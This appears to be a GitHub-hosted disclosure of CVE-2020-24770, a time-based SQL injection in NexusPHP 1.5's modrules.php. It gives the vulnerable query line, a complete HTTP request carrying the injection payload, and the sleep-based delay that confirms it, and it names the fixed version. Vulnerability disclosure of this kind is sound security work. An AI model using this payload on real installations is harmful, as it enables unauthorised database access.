Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Need get the administrator's identity to complete the attack.

CVE-2020-24770

Affected software: NexusPHP 1.5

fixed version: nexusphp v1.6.0-beta2 https://github.com/xiaomlove/nexusphp/releases

Software Download Link: http://sourceforge.net/projects/nexusphp/

Github Repository https://github.com/xiaomlove/nexusphp

Vulnerability details

modrules.php:line 42

	$res = @mysql_fetch_array(@sql_query("select * from rules where id='$id'"));

exploit:

GET /modrules.php?act=edit&id=1%27%20and%20sleep(2)%23 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: administrator_cookies
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

/modrules.php?act=edit&id=1%27%20and%20sleep(2)%23

The return will be delayed for 2 seconds

/modrules.php?act=edit&id=1%27%20and%20sleep(0)%23

The return will be delayed for 0 seconds